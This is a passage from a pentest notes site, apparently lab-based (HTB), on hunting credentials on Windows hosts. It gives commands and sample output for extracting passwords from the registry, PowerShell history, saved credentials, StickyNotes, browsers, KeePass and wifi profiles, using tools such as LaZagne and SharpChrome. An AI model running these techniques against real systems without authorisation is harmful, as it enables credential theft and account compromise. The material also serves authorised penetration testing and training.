0xSs0rZ
  • Hello World
  • Whoami
  • Interesting Books
  • Pentest
    • CheckLists
    • Recon
      • Tools
      • Information Gathering
      • OSINT
        • Tools
        • Emails
        • Dark Web Exposure
        • Database Leak - Credential stuffing
        • Code Search (Gitlab / Github)
        • Credentials in git repos
        • GitHub - finding vulnerabilities
        • API Leaks
        • Docker
        • Social Media
        • Credentials in YouTube Videos
        • Metadata and Hidden infos
      • Whois
      • Google Dorks
      • Git Dorks
      • Cloud
      • DNS Subdomain Enumeration
      • Virtual Host
      • Fingerprinting / Crawling
      • Host Discovery
    • Protocols
      • Port Scan
      • IDS IPS AV Evasion
      • Common Ports
      • MindMap
      • DNS (53)
      • FTP (21)
      • IMAP POP3 (110, 143, 993, 995)
      • IPMI (623 UDP)
      • Kerberos (88)
      • LDAP (389)
      • MSSQL (1433)
      • MySQL (3306)
      • NFS (2049, 111)
      • Oracle TNS (1521, 1522-1529, 1748)
      • RDP (3389)
      • R-Services (512,513,514)
      • RSYNC (873)
      • SMB (445, 139) / RPC
      • SMTP (25, 465)
      • SNMP (10161, UDP 161)
      • SQLite
      • SSH (22)
      • WinRM (5985, 5986)
      • WMI (135)
    • Brute force
      • Default Credentials
      • Password lists
      • Username lists
      • Kraken - All-in-One Tool
      • Bypass IP Blocking
      • Hydra - Basics
      • Web login
      • FTP Bruteforce
      • O365 Bruteforce
      • POP3 Bruteforce
      • RDP Bruteforce
      • SMB Bruteforce
      • SMTP Bruteforce
      • SSH Bruteforce
      • WinRM Bruteforce
      • VNC Bruteforce
    • Shells
      • Web Shell
      • Bind and Reverse Shell
      • TTY Upgrade
    • File Transfer
      • Upload
      • Download - Exfiltration
      • Encryption
    • Web attacks
      • Methodology & Academy
      • OWASP Top 10
      • Avoid Aggressive Scanning
      • Web Enumeration
      • Fuzzing
      • Bypass 403 / 401
      • Bypass 302
      • Registration Form
      • Email Verification Bypass
      • Email injections
      • Phone Number Injection
      • Login Forms Attacks
        • RCE in Login Page
        • Bypass Authentication
        • Login Brute Force
        • Stay Logged In
        • PHP Type Juggling
      • Bypass Captcha
      • SSO
        • OAuth / Okta Misconfiguration
        • SCIM
        • SAML
      • 2FA / OTP
      • Password Reset
      • SQL Injection
      • NoSQL injection
      • LDAP Injection
      • XSS
      • SSI / ESI Injection
      • CSP Bypass
      • File Inclusion LFI / RFI
      • File Upload Attacks
      • Command Injection
      • Markdown injection
      • XPath Injection
      • HTTP Verb Tampering
      • HTTP Header Exploitation
      • HTTP Request Smuggling
      • Price / Checkout Manipulation Methods
      • Testing Credit Cards
      • Cookies Misconfiguration
      • Basic HTTP Authentification
      • JWT Token
      • IDOR
      • XXE / XSLT
      • SSTI
      • CSTI
      • SSRF
      • CSRF
      • CORS
      • Open Redirection
      • CSPT
      • Relative Path Overwrite, RPO
      • CRLF Injection
      • JSON Attack
      • Prototype Pollution
      • Web Mass Assignment
      • Web Cache
      • Clickjacking
      • Tabnabbing
      • Race Conditons
      • CSV Injection
      • CSS Exfiltration
      • WAF Bypass
      • CMS
      • Django
      • Flask / Werkzeug
      • Tomcat (8080)
      • Tomcat CGI
      • Jetty
      • Nginx
      • IIS
      • Exchange / OWA
      • GitLab
      • Jenkins
      • Splunk
      • Elasticsearch
      • PRTG Network Monitor
      • osTicket
      • ColdFusion
      • Nagios
      • Webmin
      • Slack
      • Moodle
      • Jira
      • Magento
      • Prestashop
      • Docker
      • KeyCloak
      • Jupyter Notebook
    • API
      • OWASP API Top 10
      • Checklist
      • API Discovery / Reco
      • Sensitive Data (API Key, JWT token, etc.) Exposed
      • Postman Usage
      • ZAP Scanner & other scanning methods
      • Swagger UI
      • REST API
      • Improper Asset Management
      • Email Enumeration
      • Authentication Bruteforce
      • JWT Token
      • Insecure UUID
      • Mass Assignment
      • Server Side Parameter Pollution
      • IDOR
      • JSON Injection
      • Path Traversal
      • Rate Limiting
      • GraphQL
      • Tools & Scanners
      • Resources
    • Public Exploit
      • Search for CVE PoC
      • Convert line breaks from DOS to Linux
      • 7 zip
      • Adobe Acrobate Reader
      • Aiohttp
      • Angular
      • AnyDesk
      • Apache Active MQ
      • Apache Camel
      • Apache OFBiz
      • Apache Struts
      • Apache Traffic Control
      • Axis IP Camera
      • Cacti
      • Chamilo elearning
      • Check Point
      • Cisco
      • Citrix
      • Cleo File Transfer
      • Commvault
      • CrushFTP
      • CyberPanel
      • D-Link
      • Denodo Scheduler
      • F5 Big-IP
      • Froxlor
      • Fortinet
      • GeoServer
      • Ghostscript
      • Gitea
      • GLPI
      • Gogs
      • Grafana
      • Invision Community
      • Ivanti
      • Keycloak
      • Laravel
      • Mitel MiCollab
      • MobileIron
      • MOVEit Transfer
      • Navidrome
      • Next.js
      • Node.js
      • Nostromo
      • NVMS 1000
      • OpenNetAdmin
      • Oracle PeopleSoft
      • Oracle Weblogic
      • Palo Alto
      • Pandora
      • PDF.js
      • pfSense
      • PHP
      • phpMyAdmin
      • Prestashop
      • Roundcube
      • rsync
      • Salesforce
      • SAP
      • SolarWinds
      • SonicWall
      • Splunk
      • Spring
      • SQLPad
      • Squid Proxy
      • SuiteCRM
      • Symfony
      • Synology
      • TeamViewer
      • TP Link
      • vBulletin
      • Vite.js
      • VMWare
      • Wazuh
      • Winrar
      • YesWiki
      • Zabbix
      • Zimbra
      • ZoneAlarm AV/Firewall
      • ZoneMinder
    • External Pentest
    • Internal Pentest
      • Tools
      • Methodology & Cheatsheet
      • Basic Windows Commands
      • Network Attacks
      • LLMNR NBT-NS Poisoning
      • ADIDNS Spoofing
      • TimeRoast
      • Users Identification
      • Password Policy
      • Password Spray
      • LDAP Pass Back Attack
      • Reconaissance
        • Bloodhound
        • Enumeration from Windows Host
        • Enumeration from Linux Host
      • Microsoft Office & Outlook
      • Microsoft SharePoint
      • Windows Exploit
      • Print Spooler
      • LOL Bins
      • Security Controls
      • Network Shares
      • RDWA
      • Kerberoast
      • Misconfiguration
      • Pre-Created Computer Accounts
      • Privileged Access
      • ACL
      • Privilege escalation
      • SAM & LSA secrets
      • NTLM Hashes
      • LSASS secrets
      • AD CS
      • DPAPI
      • gMSA
      • dMSA - Windows Server 2025
      • Bypass Powershell Execution Policy
      • Disable / Remove AV Defender and Firewall
      • Kerberos Double Hop Problem
      • SCCM
      • MDT
      • AD FS
      • Trustee and Resource Delegation
      • LAPS
      • DCSync
      • NTDS secrets
      • Domain Password Audit Tools
      • Trusts
      • Persistence
      • Tiering
      • Detection
    • Privilege Escalation
      • Find specific file
      • Linux
        • Tools
        • Linux PrivEsc MindMap
        • Basics Commands
        • Basics - EoP Checklist
        • Environment Enum
        • Services & Internals Enum
        • Writable files / directories
        • /etc/passwd & /etc/shadow
        • Credentials Hunting
        • Path Abuse
        • Wildcard Abuse
        • Escaping Restricted Shells
        • SUID/SGID
        • Sudo Rights Abuse
        • Privileged Groups
        • Capabilities
        • Vulnerable Services
        • Cron Job Abuse
        • Kubernetes
        • Logrotate
        • Miscellaneous Techniques
        • Kernel Exploits
        • Shared Libraries
        • Shared Object Hijacking
        • Python Library Hijacking
        • su bruteforce
        • Hardening Linux
      • Windows
        • Tools
        • Cheatsheet
        • Enumeration
        • Credentials Hunting
        • User Privileges
        • Group Privileges
        • User Account control (UAC)
        • Weak Permissions
        • Kernel / Drivers Exploits
        • Vulnerable Services
        • Token Impersonation
        • Exploit CVE
        • DLL Hijacking
        • Citrix Breakout
        • RDWeb Breakout
        • Interacting with Users
        • Pillaging
        • Miscellaneous Techniques
        • Windows Server
        • Windows Desktop Versions
        • Windows Processes
        • MSI Files
        • NTLM elevation of privilege
        • From Local Admin to NT AUTHORITY\SYSTEM
      • Docker Escape / Breakout
    • Post Exploitation
      • Covering Tracks - Linux
      • Pivot, Tunneling and Port Forwarding
      • Lateral Movement
        • Pass the Hash (PtH)
        • Pass the Ticket (PtT) - Windows
        • Pass the Ticket (PtT) - Linux
        • Fileless Lateral Movement
        • DCOM
      • Gather credentials and more
        • Credentials on Host
        • Password managers, Teamviewer, Outlook, etc.
        • Microsoft Teams Cookies
        • Browser cookies
        • Linux post exploitation
        • Screenshots, clipboard
        • IIS Credentials
        • Azure AD / Entra ID
        • MSOL (Microsoft Online Services) account
        • SCOM credentials
        • Cisco phone system
      • Exfiltration
      • Resources
    • Cracking
      • Hashes
      • Files - Encrypted
      • Blurred image, pdf, etc
    • Thick Client Pentest
    • Wifi Pentest
    • Mobile Pentest
    • Configuration Audit / Hardening
    • Code Analysis
    • Tools
      • Arsenal - Cheatsheet
      • Burp
      • Browser Extensions
      • Evil-WinRM
      • Internal Pentest Tools Pre Compiled
      • Metasploit
      • Mimikatz
      • NetExec - CME
      • PowerView
      • Rubeus
      • SQLMAP
      • Vulnerability Scanners
      • Collaborator, Web Hook, etc.
    • Search Engines
    • Cheatsheets
    • Note Keeping / Reporting / Admin Stuff
  • Cloud
    • Cloud VM
    • Enumeration
    • SSRF / RCE
    • Azure
    • AWS
      • Recon / Initial Access / Enum
      • AWS CLI
      • Pacu
      • IAM
      • VPC - Virtual Private Cloud
      • EC2 - Elastic Compute Cloud
      • Lambda Functions
      • Containers
      • CodeBuild
      • S3 - Simple Storage Service
      • RDS - Relational Database Service
      • DynamoDB
      • EBS - Elastic Block Store
      • AMI
      • SecretsManager
      • Cloudtrail
      • Route 53
      • Cognito
      • SNS - Simple Notification Service
      • Tools
      • Resources
    • GCP
    • Kubernetes
    • Tools
  • Labs
  • Antivirus Evasion - Defender
    • Mindmap
    • Defender Module for PowerShell
    • Static Analysis
    • Dynamic Analysis
    • AMSI Bypass
    • Process Injection
    • Open-Source Software
    • User Access Control (UAC)
    • AppLocker
    • LOLBAS / LOLDrivers / LOLESXi
    • PowerShell ConstrainedLanguage Mode, CLM
    • VBScript
    • Bypass all Powershell security features (AMSI,CLM)
    • Bypass AV Payload / Shells
    • Find Folder Exclusions
    • Resources
  • EDR BYPASS
    • Approches for Evasion
    • Tools
    • Obfuscation
    • EDR Killer
    • BYOVD
    • Spoof Command Line Arguments
    • Blind Spots
    • Living Off Security Tools / LOTTunels
    • Process Hollowing
    • Process Injection - Reverse Shell
    • Payload Creation
    • Shellcode Loader
    • MalDev
    • Malware Testing Lab
    • Resources
  • Red Team
    • OpSec / Anonymity
    • Initial Access
    • Infrastructure (phishing, C2, redirector)
    • C2
    • EDR / AV Bypass
    • Physical Penetration Testing
    • Bypass Bitlocker
    • Resources
  • CTF
    • OSINT
    • Forensic
      • Labs
      • PCAP Analysis - Wireshark
      • DNS
      • Active Directory - GPO
      • Rubber Ducky
      • Memory Analysis
      • Disk Analysis
      • Extract Data / File Carving
      • Metadata
      • BinWalk
      • Audio
      • PNG Images
    • Cryptography
      • Tools
      • GPG
      • RSA
      • ECB / CBC
      • Esoteric Programming Language
      • One Time Pad
      • Baconian Cipher
      • ROT-13 / Caesar
      • Morse Code
      • XOR
      • Substitution
      • Vigenere
    • Steganography
      • Methods
      • Tools
    • Write Up
      • Deadface CTF 2024
      • Intigriti 1337UP Live
      • UMDCTF 2025
Powered by GitBook
On this page
  • Key Terms to search
  • Search tool
  • Lazagne
  • SessionGopher
  • EvilTree - Regex
  • Findstr
  • dir
  • Powershell
  • Cmdkey Saved Credentials
  • Passwords - Registry
  • Application Configuration Files
  • PowerShell History File
  • PowerShell Credentials
  • Enumerate shares
  • Manspider
  • Snaffler
  • Netexec
  • Other place to look
  • Autologon
  • Putty
  • Passwords in Group Policy in the SYSVOL share -
  • Passwords in scripts in the SYSVOL share
  • Password in scripts on IT shares
  • Passwords in web.config files on dev machines and IT shares
  • unattend.xml
  • Passwords in the AD user or computer description fields
  • StickyNotes DB Files
  • KeePass databases
  • Found on user systems and shares
  • Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint
  • Other Interesting Files
  • DPAPI
  • Firefox
  • Lazagne
  • Netexec - CME
  • Metasploit
  • Chrome
  • Dictionary Files
  • Browsers - All
  • Keepass databases kdbx
  • Email
  • Wifi
  • CME - Interesting SMB modules
  1. Pentest
  2. Privilege Escalation
  3. Windows

Credentials Hunting

PreviousEnumerationNextUser Privileges

Last updated 17 days ago

Key Terms to search

Passwords
Passphrases
Keys

Username

User account

Creds

Users

Passkeys

Passphrases

configuration

dbcredential

dbpassword

pwd

Login

Credentials

Search tool

Lazagne

C:\Users\bob\Desktop> start lazagne.exe all
|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|


########## User: bob ##########

------------------- Winscp passwords -----------------

[+] Password found !!!
URL: 10.129.202.51
Login: admin
Password: SteveisReallyCool123
Port: 22

SessionGopher

PS C:\htb> Import-Module .\SessionGopher.ps1
 
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01

EvilTree - Regex

  • Regex to look for passwords: -x ".{0,3}passw.{0,3}[=]{1}.{0,18}"

  • Keywords to look for sensitive info: -k passw,db_,admin,account,user,token

python3 eviltree.py -r C:\xampp -k password,passwd,admin -i -v -q

Findstr

Start at C:\Users

C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
c:\htb>findstr /s /i cred n:\*.*

n:\Contracts\private\secret.txt:file with all credentials
n:\Contracts\private\credentials.txt:admin:SecureCredentials!
C:\> for /R %i in (*) do @findstr /I /C:"pass" "%i" >nul && echo %i
C:\> for /R %i in (*.conf *.txt *.bat *.ps1) do @findstr /I /C:"pass" "%i" >nul && echo %i
C:\htb> cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt
C:\htb> findstr /si password *.xml *.ini *.txt *.config

stuff.txt:password: l#-x9r11_2_GL!
C:\htb> findstr /spin "password" *.*

stuff.txt:1:password: l#-x9r11_2_GL!
C:\htb> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

c:\inetpub\wwwroot\web.config

dir

C:\htb>dir n:\*cred* /s /b

n:\Contracts\private\credentials.txt


C:\htb>dir n:\*secret* /s /b

n:\Contracts\private\secret.txt

Powershell

PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

    Directory: N:\Contracts\private

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/23/2022   4:36 PM             25 credentials.txt
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

N:\Contracts\private\secret.txt:1:file with all credentials
N:\Contracts\private\credentials.txt:1:admin:SecureCredentials!
PS C:\htb> select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password

stuff.txt:1:password: l#-x9r11_2_GL!

Cmdkey Saved Credentials

C:\htb> cmdkey /list

    Target: LegacyGeneric:target=TERMSRV/SQL01
    Type: Generic
    User: inlanefreight\bob

Run as another user

PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Passwords - Registry

The registry can be searched for keys and values that contain the word "password": reg query HKLM /f password /t REG_SZ /s

If you want to save some time, query this specific key to find admin AutoLogon credentials: eg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found): winexe -U 'admin%password' //10.10.149.66 cmd.exe

Application Configuration Files

Start at C:\Users

PS C:\htb> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

Sensitive IIS information such as credentials may be stored in a web.config file

PS C:\htb> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/25/2021   9:59 AM            329 web.config

<SNIP>
C:\htb> where /R C:\ *.config

c:\inetpub\wwwroot\web.config

PowerShell History File

, PowerShell stores command history to the file:

C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PS C:\htb> (Get-PSReadLineOption).HistorySavePath

C:\Users\htb-student\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\htb> gc (Get-PSReadLineOption).HistorySavePath

dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02

One-liner to retrieve the contents of all Powershell history files that we can access as our current user.

PS C:\htb> foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02

We should always recheck these files once we have local admin if our prior access did not allow us to read the files for some users.

PowerShell Credentials

Take, for example, the following script Connect-VC.ps1, which a sysadmin has created to connect to a vCenter server easily.

# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

Decrypting PowerShell Credentials

In the context of this user or abuse DPAPI

PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username

bob


PS C:\htb> $credential.GetNetworkCredential().password

Str0ng3ncryptedP@ss!

Enumerate shares

Manspider

manspider.py --threads 50 192.168.56.0/24 -d "$DOMAIN" -u "$USER" -H "$NT_HASH" --content administrateur

Snaffler

Netexec

nxc smb [IP] -u username -p password -M eventlog_creds

Other place to look

Autologon

C:\htb>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    
    <SNIP>
    
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    htb-student
    DefaultPassword    REG_SZ    HTB_@cademy_stdnt!

Note: If you absolutely must configure Autologon for your windows system, it is recommended to use Autologon.exe from the Sysinternals suite, which will encrypt the password as an LSA secret.

Putty

PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
    Present    REG_DWORD    0x1
    HostName    REG_SZ
    LogFileName    REG_SZ    putty.log
    
  <SNIP>
  
    ProxyDNS    REG_DWORD    0x1
    ProxyLocalhost    REG_DWORD    0x0
    ProxyMethod    REG_DWORD    0x5
    ProxyHost    REG_SZ    proxy
    ProxyPort    REG_DWORD    0x50
    ProxyUsername    REG_SZ    administrator
    ProxyPassword    REG_SZ    1_4m_th3_@cademy_4dm1n!

Passwords in Group Policy in the SYSVOL share -

See Netexec - CME module gpp

Passwords in scripts in the SYSVOL share

See:

Password in scripts on IT shares

Passwords in web.config files on dev machines and IT shares

unattend.xml

Search unattend.xml:

PS C:\> Get-ChildItem -Path C:\ -Filter "unattend.xml" -Recurse -ErrorAction SilentlyContinue
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
    <settings pass="specialize">
        <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
            <AutoLogon>
                <Password>
                    <Value>local_4dmin_p@ss</Value>
                    <PlainText>true</PlainText>
                </Password>
                <Enabled>true</Enabled>
                <LogonCount>2</LogonCount>
                <Username>Administrator</Username>
            </AutoLogon>
            <ComputerName>*</ComputerName>
        </component>
    </settings>

Passwords in the AD user or computer description fields

  • See Netexec - CME module users

StickyNotes DB Files

PS C:\htb> ls
 
 
    Directory: C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/25/2021  11:59 AM          20480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
-a----         5/25/2021  11:59 AM            982 Ecs.dat
-a----         5/25/2021  11:59 AM           4096 plum.sqlite
-a----         5/25/2021  11:59 AM          32768 plum.sqlite-shm
-a----         5/25/2021  12:00 PM         197792 plum.sqlite-wal

With Powershell

PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A

PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
 
Text
----
\id=de368df0-6939-4579-8d38-0fda521c9bc4 vCenter
\id=e4adae4c-a40b-48b4-93a5-900247852f96
\id=1a44a631-6fff-4961-a4df-27898e9e1e65 root:Vc3nt3R_adm1n!
\id=c450fc5f-dc51-4412-b4ac-321fd41c522a Thycotic demo tomorrow at 10am

Strings 

0xss0rz@htb[/htb]$  strings plum.sqlite-wal

CREATE TABLE "Note" (
"Text" varchar ,
"WindowPosition" varchar ,
"IsOpen" integer ,
"IsAlwaysOnTop" integer ,
"CreationNoteIdAnchor" varchar ,
"Theme" varchar ,
"IsFutureNote" integer ,
"RemoteId" varchar ,
"ChangeKey" varchar ,
"LastServerVersion" varchar ,
"RemoteSchemaVersion" integer ,
"IsRemoteDataInvalid" integer ,
"PendingInsightsScan" integer ,
"Type" varchar ,
"Id" varchar primary key not null ,
"ParentId" varchar ,
"CreatedAt" bigint ,
"DeletedAt" bigint ,
"UpdatedAt" bigint )'
indexsqlite_autoindex_Note_1Note
af907b1b-1eef-4d29-b238-3ea74f7ffe5caf907b1b-1eef-4d29-b238-3ea74f7ffe5c
U	af907b1b-1eef-4d29-b238-3ea74f7ffe5c
Yellow93b49900-6530-42e0-b35c-2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c
U	93b49900-6530-42e0-b35c-2663989ae4b3


< SNIP >

\id=011f29a4-e37f-451d-967e-c42b818473c2 vCenter
\id=34910533-ddcf-4ac4-b8ed-3d1f10be9e61 alright*
\id=ffaea2ff-b4fc-4a14-a431-998dc833208c root:Vc3nt3R_adm1n!ManagedPosition=Yellow93b49900-6530-42e0-b35c-2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c

KeePass databases

Found on user systems and shares

Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint

Specific file

Other Interesting Files

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*

DPAPI

Firefox

Lazagne

laZagne.exe browsers

Netexec - CME

module firefox

Apr 09, 2024 - 08:28:05 (EDT)] exegol-CPTS /workspace # cme smb -L            
[*] firefox                   Dump credentials from Firefox

Metasploit

 meterpreter > run post/multi/gather/firefox_creds

[*] Checking for Firefox directory in: C:\Documents and Settings\Administrator\Application Data\Mozilla\
[*] Found Firefox installed
[*] Locating Firefox Profiles...

[+] Found Profile 8r4i3uac.default
[+] Downloading cookies.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading cookies.sqlite-journal file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading key3.db file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading signons.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
meterpreter >

Chrome 

PS C:\htb> .\SharpChrome.exe logins /unprotect

  __                 _
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
 __) | | (_| |  |_) \_ | | | (_) | | | (/_
                |
  v1.7.0


[*] Action: Chrome Saved Logins Triage

[*] Triaging Chrome Logins for current user



[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key      : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0


--- Chrome Credential (Path: C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---

file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.inlanefreight.local/,https://vc01.inlanefreight.local/ui,4/12/2021 5:16:52 PM,13262735812597100,bob@inlanefreight.local,Welcome1

Dictionary Files

PS C:\htb> gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Password1234!

Browsers - All

Keepass databases kdbx

[Apr 25, 2024 - 03:07:05 (EDT)] exegol-CPTS /workspace # keepass2john Logins.kdbx 
Logins:$keepass$*2*60000*0*048f742ba4e83db43180a31b429023defcb09a2e4110956e218a498c90bfc39a*2f3c5560d95ead326c79f32988cbab81bafcabbd4cd69cd237a1d2fbadd7fb84*1eef873a28851d1fcd946d2b24bd29f6*d68c6859ae565c09ddc5b81c39d87565cc8c50338a3fb9e6e0a3425e55b0b7a3*35683df41573246ad58a3fdad9a764d7b5d4e3610e1a021be2f2f1018523c065
[Apr 25, 2024 - 03:12:31 (EDT)] exegol-CPTS /workspace # keepass2john Logins.kdbx > Logins.hash
[Apr 25, 2024 - 03:12:38 (EDT)] exegol-CPTS /workspace # hashcat Logins.hash /usr/share/wordlists/rockyou.txt --user
hashcat Logins.hash /usr/share/wordlists/rockyou.txt --user -m 13400

Email

Wifi

If we obtain local admin access to a user's workstation with a wireless card, we can list out any wireless networks they have recently connected to.

C:\htb> netsh wlan show profile

Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Smith Cabin
    All User Profile     : Bob's iPhone
    All User Profile     : EE_Guest
    All User Profile     : EE_Guest 2.4
    All User Profile     : ilfreight_corp
C:\htb> netsh wlan show profile ilfreight_corp key=clear

CME - Interesting SMB modules

[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.

[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe

[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials

Copy the three plum.sqlite* files down to our system and open them with a tool such as and view the Text column in the Note table with the query select Text from Note;.

-> pull hash, crack and get loads of access. See

For more tools - See

Find specific file
Network Shares
NetExec - CME
Netexec - CME module
NetExec - CME
DB Browser for SQLite
Find specific file
DPAPI
Post Exploit - Browsers Cookies
NetExec - CME
Manspider
Keepass
Enumerate shares
GitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub
GitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub
GitHub - Arvanaghi/SessionGopher: SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.GitHub
GitHub - t3l3machus/eviltree: A python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches.GitHub
Network shares | The Hacker Recipes
GitHub - blacklanternsecurity/MANSPIDER: Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!GitHub
GitHub - SnaffCon/Snaffler: a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )GitHub
GitHub - RamblingCookieMonster/PSSQLite: PowerShell module to query SQLite databasesGitHub
